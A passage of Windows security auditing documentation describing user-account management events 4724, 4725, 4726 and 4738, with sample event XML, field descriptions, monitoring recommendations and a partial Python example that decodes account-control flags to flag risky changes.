<EventRecordID>175740</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="548" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">User1</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-1107</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30d5f</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made an attempt to reset Target’s Account password. Event
Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made an attempt to reset Target’s
Account password.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Target Account: account for which password reset was requested.
Security ID [Type = SID]: SID of account for which password reset was requested. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see
the source data in the event.
Account Name [Type = UnicodeString]: the name of the account for which password reset was requested.
Account Domain [Type = UnicodeString]: target account’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.

Security Monitoring Recommendations
For 4724(S, F): An attempt was made to reset an account's password.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a high-value domain or local user account for which you need to monitor every password reset
attempt, monitor all 4724 events with the “Target Account\Security ID” that corresponds to the account.
If you have a high-value domain or local account for which you need to monitor every change, monitor all
4724 events with the “Target Account\Security ID” that corresponds to the account.
If you have domain or local accounts for which the password should never be reset, you can monitor all
4724 events with the “Target Account\Security ID” that corresponds to the account.
We recommend monitoring all 4724 events for local accounts, because their passwords usually do not
change often. This is especially relevant for critical servers, administrative workstations, and other high
value assets.
4725(S): A user account was disabled.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time a user or computer object is disabled.
For user accounts, this event generates on domain controllers, member servers, and workstations.
For computer accounts, this event generates only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4725</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-21T23:55:07.657358900Z" />
<EventRecordID>175714</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1112" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">Auditor</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-2104</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30d5f</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “disable account” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “disable account”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Target Account:
Security ID [Type = SID]: SID of account that was disabled. Event Viewer automatically tries to resolve
SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the account that was disabled.
Account Domain [Type = UnicodeString]: target account’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.

Security Monitoring Recommendations
For 4725(S): A user account was disabled.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a high-value domain or local account for which you need to monitor every change, monitor all
4725 events with the “Target Account\Security ID” that corresponds to the account.
If you have domain or local accounts that should never be disabled (for example, service accounts), you can
monitor all 4725 events with the “Target Account\Security ID” that corresponds to the account.
We recommend monitoring all 4725 events for local accounts, because these accounts usually do not
change often. This is especially relevant for critical servers, administrative workstations, and other high
value assets.
4726(S): A user account was deleted.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time a user object is deleted.
This event generates on domain controllers, member servers, and workstations.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4726</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-22T00:52:25.104613800Z" />
<EventRecordID>175720</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1112" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">ksmith</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6609</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30d5f</Data>
<Data Name="PrivilegeList">-</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “delete user account” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “delete user account”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Target Account:
Security ID [Type = SID]: SID of account that was deleted. Event Viewer automatically tries to resolve SIDs
and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the account that was deleted.
Account Domain [Type = UnicodeString]: target account’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See full list of user privileges in “Table 8. User Privileges.”.

Security Monitoring Recommendations
For 4726(S): A user account was deleted.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a high-value domain or local account for which you need to monitor every change (or deletion),
monitor all 4726 events with the “Target Account\Security ID” that corresponds to the account.
If you have a domain or local account that should never be deleted (for example, service accounts), monitor
all 4726 events with the “Target Account\Security ID” that corresponds to the account.
We recommend monitoring all 4726 events for local accounts, because these accounts typically are not
deleted often. This is especially relevant for critical servers, administrative workstations, and other high
value assets.
4738(S): A user account was changed.
4/5/2019 • 16 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time a user object is changed. It generates on domain controllers, member servers, and workstations, and a separate 4738 event is generated for each change.
You might see this event without any changes inside, that is, where all Changed Attributes appear as “-”. This usually happens when a change is made to an attribute that is not listed in the event; in that case there is no way to determine from the event which attribute was changed. For example, if the discretionary access control list (DACL) of the user object is changed, a 4738 event will generate, but all attributes will be “-”.
Some changes do not invoke a 4738 event.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4738</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-20T16:22:02.792454100Z" />
<EventRecordID>175413</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1508" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="Dummy">-</Data>
<Data Name="TargetUserName">ksmith</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6609</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30dc2</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="SamAccountName">-</Data>
<Data Name="DisplayName">-</Data>
<Data Name="UserPrincipalName">-</Data>
<Data Name="HomeDirectory">-</Data>
<Data Name="HomePath">-</Data>
<Data Name="ScriptPath">-</Data>
<Data Name="ProfilePath">-</Data>
<Data Name="UserWorkstations">-</Data>
<Data Name="PasswordLastSet">-</Data>
<Data Name="AccountExpires">-</Data>
<Data Name="PrimaryGroupId">-</Data>
<Data Name="AllowedToDelegateTo">-</Data>
<Data Name="OldUacValue">0x15</Data>
<Data Name="NewUacValue">0x211</Data>
<Data Name="UserAccountControl">%%2050 %%2089</Data>
<Data Name="UserParameters">-</Data>
<Data Name="SidHistory">-</Data>
<Data Name="LogonHours">-</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “change user account” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “change user
account” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Target Account:
Security ID [Type = SID]: SID of account that was changed. Event Viewer automatically tries to resolve
SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the account that was changed.
Account Domain [Type = UnicodeString]: target account’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Changed Attributes:
If an attribute was not changed, it will have the “-” value.
Unfortunately, for local accounts every Changed Attributes field is populated with the account’s current value whether or not it was changed; only the User Account Control field is populated solely when it was modified. Because the fields show only the new (or current) value, it is hard to understand which attribute was really changed.
SAM Account Name [Type = UnicodeString]: logon name for account used to support clients and servers
from previous versions of Windows (pre-Windows 2000 logon name). If the value of sAMAccountName
attribute of user object was changed, you will see the new value here. For example: ladmin. For local
accounts, this field always has some value—if the account's attribute was not changed it will contain the
current value of the attribute.
Display Name [Type = UnicodeString]: it is a name, displayed in the address book for a particular account.
This is usually the combination of the user's first name, middle initial, and last name. You can change this
attribute by using Active Directory Users and Computers, or through a script, for example. If the value of
displayName attribute of user object was changed, you will see the new value here. For local accounts,
this field always has some value—if the account's attribute was not changed it will contain the current value
of the attribute.
User Principal Name [Type = UnicodeString]: internet-style login name for the account, based on the
Internet standard RFC 822. By convention this should map to the account's email name. If the value of
userPrincipalName attribute of user object was changed, you will see the new value here. You can change
this attribute by using Active Directory Users and Computers, or through a script, for example. For local
accounts, this field is not applicable and always has “-“ value.
Home Directory [Type = UnicodeString]: user's home directory. If homeDrive attribute is set and
specifies a drive letter, homeDirectory should be a UNC path. The path must be a network UNC of the
form \\Server\Share\Directory. If the value of homeDirectory attribute of user object was changed, you
will see the new value here. You can change this attribute by using Active Directory Users and Computers,
or through a script, for example. For local accounts, this field always has some value—if the account's
attribute was not changed it will contain the current value of the attribute.
Home Drive [Type = UnicodeString]: specifies the drive letter to which to map the UNC path specified by
homeDirectory account’s attribute. The drive letter must be specified in the form “DRIVE_LETTER:”. For
example – “H:”. If the value of homeDrive attribute of user object was changed, you will see the new value
here. You can change this attribute by using Active Directory Users and Computers, or through a script, for
example. For local accounts, this field always has some value—if the account's attribute was not changed it
will contain the current value of the attribute.
Script Path [Type = UnicodeString]: specifies the path of the account’s logon script. If the value of
scriptPath attribute of user object was changed, you will see the new value here. You can change this
attribute by using Active Directory Users and Computers, or through a script, for example. For local
accounts, this field always has some value—if the account's attribute was not changed it will contain the
current value of the attribute.
Profile Path [Type = UnicodeString]: specifies a path to the account's profile. This value can be a null
string, a local absolute path, or a UNC path. If the value of profilePath attribute of user object was
changed, you will see the new value here. You can change this attribute by using Active Directory Users and
Computers, or through a script, for example. For local accounts, this field always has some value—if the
account's attribute was not changed it will contain the current value of the attribute.
User Workstations [Type = UnicodeString]: contains the list of NetBIOS or DNS names of the computers
from which the user can logon. Each computer name is separated by a comma. The name of a computer is
the sAMAccountName property of a computer object. If the value of userWorkstations attribute of user
object was changed, you will see the new value here. You can change this attribute by using Active
Directory Users and Computers, or through a script, for example. For local accounts, this field is not
applicable and always appears as “<value not set>”.
Password Last Set [Type = UnicodeString]: last time the account’s password was modified. If the value of
pwdLastSet attribute of user object was changed, you will see the new value here. For example: 8/12/2015
11:41:39 AM. This value will be changed, for example, after manual user account password reset. For local
accounts, this field always has some value—if the account's attribute was not changed it will contain the
current value of the attribute.
Account Expires [Type = UnicodeString]: the date when the account expires. If the value of
accountExpires attribute of user object was changed, you will see the new value here. For example,
“9/21/2015 12:00:00 AM”. You can change this attribute by using Active Directory Users and Computers,
or through a script, for example. For local accounts, this field always has some value—if the account's
attribute was not changed it will contain the current value of the attribute.
Primary Group ID [Type = UnicodeString]: Relative Identifier (RID) of user’s object primary group.

Note Relative identifier (RID) is a variable length number that is assigned to objects at creation and
becomes part of the object's Security Identifier (SID) that uniquely identifies an account or group within a
domain.

This field will contain some value if user’s object primary group was changed. You can change user’s primary
group using Active Directory Users and Computers management console in the Member Of tab of user object
properties. You will see a RID of new primary group as a field value. For example, RID 513 (Domain Users) is a
default primary group for users.
Typical Primary Group values for user accounts:
513 (Domain Users. For local accounts this RID means Users) – for domain and local users.
See this article https://support.microsoft.com/kb/243330 for more information. If the value of
primaryGroupID attribute of user object was changed, you will see the new value here.
AllowedToDelegateTo [Type = UnicodeString]: the list of SPNs to which this account can present
delegated credentials. Can be changed using Active Directory Users and Computers management console
in Delegation tab of user account, if at least one SPN is registered for user account. If the SPNs list on
Delegation tab of a user account was changed, you will see the new SPNs list in AllowedToDelegateTo
field (note that you will see the new list instead of changes) of this event. This is an example of
AllowedToDelegateTo:
dcom/WIN2012
dcom/WIN2012.contoso.local
If the value of msDS-AllowedToDelegateTo attribute of user object was changed, you will see the
new value here.
The value can be “<value not set>”, for example, if delegation was disabled.
For local accounts, this field is not applicable and always has “-“ value.

Note Service Principal Name (SPN) is the name by which a client uniquely identifies an instance of a
service. If you install multiple instances of a service on computers throughout a forest, each instance must
have its own SPN. A given service instance can have multiple SPNs if there are multiple names that clients
might use for authentication. For example, an SPN always includes the name of the host computer on which
the service instance is running, so a service instance might register an SPN for each name or alias of its host.

Old UAC Value [Type = UnicodeString]: specifies flags that control password, lockout, disable/enable,
script, and other behavior for the user account. This parameter contains the previous value of
userAccountControl attribute of user object.
New UAC Value [Type = UnicodeString]: specifies flags that control password, lockout, disable/enable,
script, and other behavior for the user account. If the value of userAccountControl attribute of user object
was changed, you will see the new value here.
To decode either value, walk the flag list from the largest flag value to the smallest: if the remaining flags value is greater than or equal to the flag’s value, that flag is set; subtract it and continue with the next flag. Equivalently, a flag is set when the bitwise AND of the flags value and the flag’s value is non-zero, and the bits that changed are the bitwise XOR of Old UAC Value and New UAC Value.
Note that the bit layout of these two fields is the SAM account-control encoding that the SAM server reports, not the LDAP userAccountControl values listed in “Table 7. User’s or Computer’s account UAC flags.”: in this layout 0x1 is ‘Account Disabled’, 0x2 ‘Home Directory Required’, 0x4 ‘Password Not Required’, 0x10 ‘Normal Account’, 0x200 ‘Don't Expire Password’, 0x800 ‘Encrypted Text Password Allowed’, 0x1000 ‘Smartcard Required’, 0x2000 ‘Trusted For Delegation’, 0x4000 ‘Not Delegated’, 0x8000 ‘Use DES Key Only’, 0x10000 ‘Don't Require Preauth’ and 0x40000 ‘Trusted To Authenticate For Delegation’. The text lines in the User Account Control field are the authoritative list of what changed; use the hex values to confirm them.
Here's an example, using the sample event above (Old UAC Value 0x15, New UAC Value 0x211):
• 0x15 = 0x10 + 0x4 + 0x1: ‘Normal Account’, ‘Password Not Required’ and ‘Account Disabled’ were set before the change.
• 0x211 = 0x200 + 0x10 + 0x1: ‘Don't Expire Password’, ‘Normal Account’ and ‘Account Disabled’ are set after the change.
• 0x15 XOR 0x211 = 0x204: the 0x4 bit was cleared and the 0x200 bit was set.
So this change decodes to ‘Password Not Required’ – Disabled and ‘Don't Expire Password’ – Enabled, which is what the two User Account Control lines of the sample event (%%2050 and %%2089) render as.
User Account Control [Type = UnicodeString]: shows the list of changes in userAccountControl
attribute. You will see a line of text for each change. See the possible values in “Table 7. User’s or Computer’s account UAC flags.”; its “User Account Control field text” column shows the text that is displayed in the User Account Control field of the 4738 event.
User Parameters [Type = UnicodeString]: if you change any setting using Active Directory Users and
Computers management console in Dial-in tab of user’s account properties, then you will see <value
changed, but not displayed> in this field. For local accounts, this field is not applicable and always has
“<value not set>“ value.
SID History [Type = UnicodeString]: contains previous SIDs used for the object if the object was moved
from another domain. Whenever an object is moved from one domain to another, a new SID is created and
becomes the objectSID. The previous SID is added to the sIDHistory property. If the value of sIDHistory
attribute of user object was changed, you will see the new value here.
Logon Hours [Type = UnicodeString]: hours that the account is allowed to logon to the domain. If the
value of logonHours attribute of user object was changed, you will see the new value here. You can
change this attribute by using Active Directory Users and Computers, or through a script, for example.
Here is an example of this field:
Sunday 12:00 AM - 7:00 PM
Sunday 9:00 PM -Monday 1:00 PM
Monday 2:00 PM -Tuesday 6:00 PM
Tuesday 8:00 PM -Wednesday 10:00 AM
For local accounts this field is not applicable and typically has value “All”.
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as
“-”. See full list of user privileges in “Table 8. User Privileges.”.

Security Monitoring Recommendations
For 4738(S): A user account was changed.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Some organizations monitor every 4738 event.
If you have critical user accounts (for example, domain administrator accounts or service accounts) for which you need to monitor each change, monitor this event with the “Target Account\Account Name” that corresponds to the critical account or accounts.
If you have user accounts for which any change in the services list on the Delegation tab should be
monitored, monitor this event when AllowedToDelegateTo is not -. This value means the services list
was changed.
Consider whether to track the following fields (field to track: reason to track):
• Display Name, User Principal Name, Home Directory, Home Drive, Script Path, Profile Path, User Workstations, Password Last Set, Account Expires, Primary Group ID, Logon Hours: we recommend monitoring all changes to these fields for critical domain and local accounts.
• Primary Group ID is not 513: typically, the Primary Group value is 513 for domain and local users. Other values should be monitored.
• AllowedToDelegateTo is marked <value not set>, for user accounts for which the services list (on the Delegation tab) should not be empty: if AllowedToDelegateTo is marked <value not set> on a user account that previously had a services list (on the Delegation tab), it means the list was cleared.
• SID History is not -: this field will always be set to - unless the account was migrated from another domain.

Consider whether to track the following user account control flags (flag to track: information about the flag):
• 'Normal Account' – Disabled: Should not be disabled for user accounts.
• 'Password Not Required' – Enabled: Should not typically be enabled for user accounts because it weakens security for the account.
• 'Encrypted Text Password Allowed' – Enabled: Should not typically be enabled for user accounts because it weakens security for the account.
• 'Server Trust Account' – Enabled: Should never be enabled for user accounts. Applies only to domain controller (computer) accounts.
• 'Don't Expire Password' – Enabled: Should be monitored for critical accounts, or all accounts if your organization does not allow this flag.
• 'Smartcard Required' – Enabled: Should be monitored for critical accounts.
• 'Password Not Required' – Disabled: Should be monitored for all accounts where the setting should be “Enabled.”
• 'Encrypted Text Password Allowed' – Disabled: Should be monitored for all accounts where the setting should be “Enabled.”
• 'Don't Expire Password' – Disabled: Should be monitored for all accounts where the setting should be “Enabled.”
• 'Smartcard Required' – Disabled: Should be monitored for all accounts where the setting should be “Enabled.”
• 'Trusted For Delegation' – Enabled: Means that Kerberos constrained or unconstrained delegation was enabled for the user account. We recommend monitoring this to discover whether it is an approved action (done by an administrator), a mistake, or a malicious action.
• 'Trusted For Delegation' – Disabled: Means that Kerberos constrained or unconstrained delegation was disabled for the user account. We recommend monitoring this to discover whether it is an approved action (done by an administrator), a mistake, or a malicious action. Also, if you have a list of user accounts for which delegation is critical and should not be disabled, monitor this for those accounts.
• 'Trusted To Authenticate For Delegation' – Enabled: Means that protocol transition delegation was enabled for the user account. We recommend monitoring this to discover whether it is an approved action (done by an administrator), a mistake, or a malicious action.
• 'Trusted To Authenticate For Delegation' – Disabled: Means that protocol transition delegation was disabled for the user account. We recommend monitoring this to discover whether it is an approved action (done by an administrator), a mistake, or a malicious action. Also, if you have a list of user accounts for which delegation is critical and should not be disabled, monitor this for those accounts.
• 'Not Delegated' – Enabled: Means that the “Account is sensitive and cannot be delegated” option was checked for the user account. We recommend monitoring this to discover whether it is an approved action (done by an administrator), a mistake, or a malicious action.
• 'Not Delegated' – Disabled: Should be monitored for all accounts where the setting should be “Enabled.” Means that the “Account is sensitive and cannot be delegated” option was unchecked for the user account. We recommend monitoring this to discover whether it is an approved action (done by an administrator), a mistake, or a malicious action.
• 'Use DES Key Only' – Enabled: Should not typically be enabled for user accounts because it weakens security for the account’s Kerberos authentication.
• 'Don't Require Preauth' – Enabled: Should not be enabled for user accounts because it weakens security for the account’s Kerberos authentication.
• 'Use DES Key Only' – Disabled: Should be monitored for all accounts where the setting should be “Enabled.”
• 'Don't Require Preauth' – Disabled: Should be monitored for all accounts where the setting should be “Enabled.”
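The following Python is an added example, not code from the Microsoft documentation: it implements the Old/New UAC Value decoding described in the field descriptions above and the checks in these recommendations (flag transitions, Primary Group ID, SID History, AllowedToDelegateTo), and runs them over the sample 4738 event from this page. It assumes the SAM account-control bit layout for the two hex values, reads the event in the XML form shown above (as exported by Event Viewer or wevtutil), and the names decode_uac, uac_changes, evaluate_4738 and ALERT_TRANSITIONS are this example's own.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Bit layout of the Old/New UAC Value fields: the SAM account-control (USER_*) codes
# reported by the SAM server, not the LDAP userAccountControl values. The page's
# sample (0x15 -> 0x211) matches its User Account Control text only under this layout.
SAM_UAC_FLAGS = {
    0x00000001: "ACCOUNT_DISABLED",
    0x00000002: "HOME_DIRECTORY_REQUIRED",
    0x00000004: "PASSWORD_NOT_REQUIRED",
    0x00000008: "TEMP_DUPLICATE_ACCOUNT",
    0x00000010: "NORMAL_ACCOUNT",
    0x00000020: "MNS_LOGON_ACCOUNT",
    0x00000040: "INTERDOMAIN_TRUST_ACCOUNT",
    0x00000080: "WORKSTATION_TRUST_ACCOUNT",
    0x00000100: "SERVER_TRUST_ACCOUNT",
    0x00000200: "DONT_EXPIRE_PASSWORD",
    0x00000400: "ACCOUNT_AUTO_LOCKED",
    0x00000800: "ENCRYPTED_TEXT_PASSWORD_ALLOWED",
    0x00001000: "SMARTCARD_REQUIRED",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00004000: "NOT_DELEGATED",
    0x00008000: "USE_DES_KEY_ONLY",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PASSWORD_EXPIRED",
    0x00040000: "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION",
    0x00080000: "NO_AUTH_DATA_REQUIRED",
    0x00100000: "PARTIAL_SECRETS_ACCOUNT",
    0x00200000: "USE_AES_KEYS",
}

# Flag transitions the recommendations single out: (flag, now enabled?) -> finding text.
ALERT_TRANSITIONS = {
    ("NORMAL_ACCOUNT", False): "'Normal Account' - Disabled on a user account",
    ("PASSWORD_NOT_REQUIRED", True): "'Password Not Required' - Enabled",
    ("ENCRYPTED_TEXT_PASSWORD_ALLOWED", True): "'Encrypted Text Password Allowed' - Enabled",
    ("SERVER_TRUST_ACCOUNT", True): "'Server Trust Account' - Enabled on a user account",
    ("DONT_EXPIRE_PASSWORD", True): "'Don't Expire Password' - Enabled",
    ("TRUSTED_FOR_DELEGATION", True): "'Trusted For Delegation' - Enabled",
    ("TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION", True): "'Trusted To Authenticate For Delegation' - Enabled",
    ("NOT_DELEGATED", False): "'Not Delegated' - Disabled",
    ("USE_DES_KEY_ONLY", True): "'Use DES Key Only' - Enabled",
    ("DONT_REQUIRE_PREAUTH", True): "'Don't Require Preauth' - Enabled",
}

def decode_uac(value):
    """Names of every flag set in a UAC value: a flag is set when value & bit is non-zero."""
    return [name for bit, name in sorted(SAM_UAC_FLAGS.items()) if value & bit]

def uac_changes(old, new):
    """(enabled, disabled): the flags whose bit differs between old and new (old ^ new)."""
    changed = old ^ new
    enabled = [n for b, n in sorted(SAM_UAC_FLAGS.items()) if changed & b and new & b]
    disabled = [n for b, n in sorted(SAM_UAC_FLAGS.items()) if changed & b and old & b]
    return enabled, disabled

def event_data(xml_text):
    """Flatten the <EventData> of a Security event into {Name: value}."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}

def evaluate_4738(xml_text, critical_sids=frozenset()):
    """Apply the 4738 recommendations to one event; return the list of findings."""
    d = event_data(xml_text)
    findings = []
    if d["TargetSid"] in critical_sids:
        findings.append("change to critical account %s\\%s" % (d["TargetDomainName"], d["TargetUserName"]))
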